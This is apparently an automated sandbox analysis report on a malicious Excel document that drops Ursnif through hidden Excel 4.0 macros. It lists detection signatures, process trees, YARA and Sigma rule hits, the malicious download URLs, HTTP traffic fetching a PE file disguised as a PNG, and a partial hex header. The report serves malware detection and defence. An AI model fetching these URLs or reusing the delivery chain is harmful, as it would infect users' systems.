Loading ...

Play interactive tourEdit tour

Analysis Report http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls

Overview

General Information

Sample URL:http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls
Analysis ID:330745

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Injects files into Windows application
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • cmd.exe (PID: 6088 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls' > cmdline.out 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wget.exe (PID: 5876 cmdline: wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls' MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • EXCEL.EXE (PID: 6840 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6524 cmdline: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 5868 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1584 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5868 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5412 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5512 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5412 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6688 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1500 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4e0f7:$s1: Excel
  • 0x505bd:$s1: Excel
  • 0x50b62:$s1: Excel
  • 0x50ec9:$s1: Excel
  • 0x50f2f:$s1: Excel
  • 0x50f48:$s1: Excel
  • 0x3ad7:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.747278419.0000000005F50000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.748655251.0000000005F50000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.747986077.0000000005F50000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            00000004.00000003.748565990.0000000005F50000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
              Click to see the 30 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer, CommandLine: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6840, ProcessCommandLine: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer, ProcessId: 6524

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              Software Vulnerabilities:

              barindex
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
              Source: excel.exeMemory has grown: Private usage: 1MB later: 115MB

              Networking:

              barindex
              Downloads files with wrong headers with respect to MIME Content-TypeShow sources
              Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 15 Dec 2020 14:43:00 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Tue, 15 Dec 2020 09:56:58 GMT ETag: "7d000-5b67dc7836e80" Accept-Ranges: bytes Content-Length: 512000 Connection: close Content-Type: image/png Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 dd 59 c9 42 bc 37 9a 42 bc 37 9a 42 bc 37 9a 65 7a 4a 9a 57 bc 37 9a 65 7a 59 9a 74 bc 37 9a 65 7a 5a 9a ca bc 37 9a 4b c4 a4 9a 45 bc 37 9a 42 bc 36 9a 29 bc 37 9a 65 7a 45 9a 43 bc 37 9a 65 7a 4d 9a 43 bc 37 9a 65 7a 4b 9a 43 bc 37 9a 65 7a 4f 9a 43 bc 37 9a 52 69 63 68 42 bc 37 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6a 71 82 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 07 00 00 e0 00 00 00 00 00 00 8e 13 01 00 00 10 00 00 00 70 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 08 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 69 07 00 82 00 00 00 a4 60 07 00 50 00 00 00 00 10 08 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 f4 19 00 00 00 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e2 59 07 00 00 10 00 00 00 60 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 9d 00 00 00 70 07 00 00 20 00 00 00 70 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 05 00 00 00 10 08 00 00 10 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 29 00 00 00 20 08 00 00 30 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 15 Dec 2020 14:43:00 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Tue, 15 Dec 2020 09:56:58 GMTETag: "7d000-5b67dc7836e80"Accept-Ranges: bytesContent-Length: 512000Connection: closeContent-Type: image/pngData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 dd 59 c9 42 bc 37 9a 42 bc 37 9a 42 bc 37 9a 65 7a 4a 9a 57 bc 37 9a 65 7a 59 9a 74 bc 37 9a 65 7a 5a 9a ca bc 37 9a 4b c4 a4 9a 45 bc 37 9a 42 bc 36 9a 29 bc 37 9a 65 7a 45 9a 43 bc 37 9a 65 7a 4d 9a 43 bc 37 9a 65 7a 4b 9a 43 bc 37 9a 65 7a 4f 9a 43 bc 37 9a 52 69 63 68 42 bc 37 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6a 71 82 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 07 00 00 e0 00 00 00 00 00 00 8e 13 01 00 00 10 00 00 00 70 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 08 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 69 07 00 82 00 00 00 a4 60 07 00 50 00 00 00 00 10 08 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 f4 19 00 00 00 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e2 59 07 00 00 10 00 00 00 60 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 9d 00 00 00 70 07 00 00 20 00 00 00 70 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 05 00 00 00 10 08 00 00 10 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 29 00 00 00 20 08 00 00 30 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: GET /ref-151220-BTC2XU590R2HT8.xls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: snenpinfrresertts.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /str.png HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: snenpinfrresertts.comConnection: Keep-Alive
              Source: msapplication.xml0.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc3a9ffe4,0x01d6d2f0</date><accdate>0xc3a9ffe4,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
              Source: msapplication.xml0.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc3a9ffe4,0x01d6d2f0</date><accdate>0xc3a9ffe4,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
              Source: msapplication.xml5.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc3aec46c,0x01d6d2f0</date><accdate>0xc3aec46c,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
              Source: msapplication.xml5.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc3aec46c,0x01d6d2f0</date><accdate>0xc3aec46c,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
              Source: msapplication.xml7.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc3aec46c,0x01d6d2f0</date><accdate>0xc3aec46c,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
              Source: msapplication.xml7.17.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc3aec46c,0x01d6d2f0</date><accdate>0xc3aec46c,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
              Source: unknownDNS traffic detected: queries for: snenpinfrresertts.com
              Source: rundll32.exe, 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmpString found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
              Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
              Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
              Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
              Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
              Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
              Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
              Source: wget.exe, 00000002.00000002.653836313.00000000001C5000.00000004.00000040.sdmp, cmdline.out.2.drString found in binary or memory: http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls
              Source: wget.exe, 00000002.00000002.653836313.00000000001C5000.00000004.00000040.sdmpString found in binary or memory: http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls-
              Source: wget.exe, 00000002.00000002.653836313.00000000001C5000.00000004.00000040.sdmpString found in binary or memory: http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xlspose
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: http://weather.service.msn.com/data.aspx
              Source: msapplication.xml.17.drString found in binary or memory: http://www.amazon.com/
              Source: msapplication.xml1.17.drString found in binary or memory: http://www.google.com/
              Source: msapplication.xml2.17.drString found in binary or memory: http://www.live.com/
              Source: msapplication.xml3.17.drString found in binary or memory: http://www.nytimes.com/
              Source: msapplication.xml4.17.drString found in binary or memory: http://www.reddit.com/
              Source: msapplication.xml5.17.drString found in binary or memory: http://www.twitter.com/
              Source: msapplication.xml6.17.drString found in binary or memory: http://www.wikipedia.com/
              Source: msapplication.xml7.17.drString found in binary or memory: http://www.youtube.com/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://analysis.windows.net/powerbi/api
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://api.aadrm.com/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://api.diagnostics.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://api.diagnosticssdf.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://api.microsoftstream.com/api/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://api.office.net
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://api.onedrive.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://apis.live.net/v5.0/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://arc.msn.com/v4/api/selection
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://augloop.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://augloop.office.com/v2
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://autodiscover-s.outlook.com/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://cdn.entity.
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://clients.config.office.net/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://config.edge.skype.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://cortana.ai
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://cr.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://dataservice.o365filtering.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://dataservice.o365filtering.com/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://devnull.onenote.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://directory.services.
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://ecs.office.com/config/v2/Office
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://entitlement.diagnostics.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://globaldisco.crm.dynamics.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://graph.ppe.windows.net
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://graph.ppe.windows.net/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://graph.windows.net
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://graph.windows.net/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://incidents.diagnostics.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
